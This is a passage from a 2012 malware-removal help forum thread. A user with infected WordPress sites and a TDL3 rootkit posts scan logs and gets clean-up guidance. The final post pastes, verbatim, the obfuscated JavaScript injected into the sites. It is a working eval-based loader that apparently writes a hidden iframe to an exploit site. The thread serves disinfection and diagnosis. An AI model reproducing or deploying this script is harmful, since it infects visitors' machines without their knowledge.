C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit


**** End of log ****

Edited by Stillrain, 02 March 2012 - 09:20 PM.


#10 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:03:49 PM

Posted 02 March 2012 - 09:26 PM

This looks like just a TDL3 rootkit so far. That's certainly good news in the circumstances.

If you like reading this stuff then ESET have done some very detailed (and techy) write-ups on TDL3 and TDL4


Please run an ESET online scan now

I'd like us to scan your machine with ESET OnlineScan
  • Hold down Control and click on the following link to open ESET OnlineScan in a new window.
    ESET OnlineScan
  • Click the Posted Image button.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on Posted Image to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the Posted Image icon on your desktop.
  • Check Posted Image
  • Click the Posted Image button.
  • Accept any security warnings from your browser.
  • Under scan settings, check Posted Image and check Remove found threats
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • Copy and paste the resulting log in your next reply
If no log is generated that means nothing was found. Please let me know if this happens.

If you think a log should have been generated then go to C:\Program Files\ESET\ESET Online Scanner\log.txt to find it.


Once that's posted please let me know what symptoms remain - especially with regards to your website problems that you mentioned.
Posted Image
m0le is a proud member of UNITE

#11 Stillrain

Stillrain
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:49 PM

Posted 03 March 2012 - 10:01 AM

Hi m0le, it took around 10 hours, here's the scan result:

C:\Qoobox\Quarantine\C\Users\x-Daemon\AppData\Local\TempDIR\BetterInstaller.exe.vir a variant of Win32/Adware.Somoto.A application cleaned by deleting - quarantined
C:\Users\x-Daemon\Downloads\cdbxp_setup_4.4.0.2838.exe Win32/OpenCandy application deleted - quarantined
C:\Users\x-Daemon\Downloads\FreeYouTubeDownloaderInstaller.exe a variant of Win32/Adware.Somoto.A application deleted - quarantined
C:\Users\x-Daemon\Downloads\VDownloader3.2.807.exe Win32/OpenCandy application deleted - quarantined
C:\Users\x-Daemon\Downloads\fsSetup132.exe Win32/Adware.Toolbar.Dealio application deleted - quarantined
D:\Dell17-HD\Desktop\Nokia\bb5.zip probably a variant of Win32/Agent.DSPQFA trojan deleted - quarantined
D:\Dell17-HD\server\backup_658978.tar.gz HTML/Iframe.B.Gen virus deleted - quarantined
D:\Dell17-HD\server\deoos\wp-includes\js\jquery\jquery.js JS/Agent.NEJ trojan cleaned by deleting - quarantined
D:\Dell17-HD\server\wordpress17\Glorius-theme.zip PHP/Kryptik.AB trojan deleted - quarantined
D:\Dell17-HD\dev\soft\GIF_Animator_3.0.zip Win32/Kryptik.BAK.gen trojan deleted - quarantined

-------------------------------------------------------------------------------------------------------
Some of the infected websites: site1, site2, site3
The AVG report for all is the same, like this one, showing warnings for blackhole exploit kit and link to exploit site

The warnings on my browser started a few days ago, that's why I started suspecting and investigating my system.

Is still TDSS the responsible for the PayPal account hijacking? I should still reformat the system, rigth? Or beeing TDL3, now it's safe?

Do external media storage can get infected by this? With what can I scann for infection, since antivirus, antimalware and even TDSS killer didn't detect it?

Thanks again, and you can count with my donation to UNITE once it's safe to access my account.

Edited by m0le, 03 March 2012 - 06:18 PM.


#12 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:03:49 PM

Posted 03 March 2012 - 06:21 PM

Okay, had to deactivate the site links because they go to sites which appear to be malicious in content.

Are these three of your own written websites which are now showing exploits?
Posted Image
m0le is a proud member of UNITE

#13 Stillrain

Stillrain
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:49 PM

Posted 03 March 2012 - 07:17 PM

Yes, and I'm realizing now that only wordpress based sites are infected, there are other sites on the same server that doesn't show malicious content. What I don't know is if I got infected from the sites, or the other way around.

I've tried many online scanners and all say the sites are clean, except AVG, but it doesn't tell me where the malicious code is. Is it safe to access the server through ftp to try and find it?

#14 m0le

m0le

    Can U Dig It?


  • Malware Response Team
  • 34,527 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:London, UK
  • Local time:03:49 PM

Posted 03 March 2012 - 07:23 PM

D:\Dell17-HD\server\backup_658978.tar.gz HTML/Iframe.B.Gen virus deleted - quarantined


This is an exploit. You're right though, this infection has hit WordPress sites. Have you contacted them?
Posted Image
m0le is a proud member of UNITE

#15 Stillrain

Stillrain
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:03:49 PM

Posted 04 March 2012 - 07:17 AM

I've opened a thread at wordpress, pretty much the only way of getting support, but it's usually answered by other users guesses, so, I wouldn't cling to it.

I think I found the malicious code checking the source code on the browser, what do you think?

<script type='text/javascript'>var a=!1;dkzvv = "\x6C\x6F\x6E\x6C\x79";if(!document.cookie.match(dkzvv)){if(window.document)try{location(12);}catch(qqq){zz='eval';aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';s=String;f='fro'+'m'+'C'+'h'+'ar';f+='Code';}ee='e';e=window[zz];t='y';}h=-2*Math.log(Math.E);n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a3.5a3.5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a57a49.5a19a16a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a55a28a22.5a22.5a49a56a49.5a47.5a53.5a54.5a54a22a49a49.5a22a50.5a50.5a22.5a51.5a54a22a48.5a50.5a51.5a30.5a24a18.5a15a58.5a51.5a49a57a51a29.5a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a49a49a49.5a54a28.5a55a54.5a56.5a51.5a57a51.5a54.5a54a28a47.5a48a56.5a54.5a53a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a3.5a3.5a61.5a3.5a3.5a50a57.5a54a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a3.5a3.5a3.5a58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a49a56a49.5a47.5a53.5a54.5a54a22a49a49.5a22a50.5a50.5a22.5a51.5a54a22a48.5a50.5a51.5a30.5a24a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5a57a49.5a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a21a18.5a23.5a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a3.5a3.5a61.5".split("a");for(i=0;-n.length<-i;i++){j=i;ss=ss+s[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(s)e(q);d_em=new Date;d_em.setTime(d_em.getTime());mme=new Date(d_em.getTime()+72E6);document.cookie=dkzvv+"="+escape(mme.toGMTString())+";expires="+mme.toGMTString()+";path=/";};</script>


After upgrading the wordpress installation, it disappears, so, maybe that's one solution.

The thing is, I don't have a way to test if the infection is really gone, as the only tool that shows it, is AVG Online Scanner, but it's not an actual scan of the site, but reports from users antivirus.

Is there any tool you know about which I could use to test if the infection is really gone?

Thanks

Edited by Stillrain, 04 March 2012 - 02:11 PM.





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users